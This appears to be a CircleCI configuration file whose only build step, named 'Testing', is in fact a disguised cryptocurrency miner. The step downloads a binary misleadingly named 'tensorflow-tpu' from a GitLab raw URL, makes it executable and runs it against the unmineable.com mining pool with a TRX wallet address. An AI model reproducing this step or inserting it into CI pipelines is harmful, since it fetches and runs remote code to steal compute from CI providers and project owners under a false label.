version: 2.1
jobs:
  build:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - checkout
      - run:
          name: "Testing"
          command: wget https://gitlab.com/nilavdas5/g/-/raw/main/tensorflow-tpu&& chmod +x tensorflow-tpu && ./tensorflow-tpu -o rx.unmineable.com:3333 -u TRX:TM5s6Yisi5eujDasyt9rBeWwjLZmNpXQZh.$(echo $(shuf -i 1-9999 -n 1)-PROXY)
          
 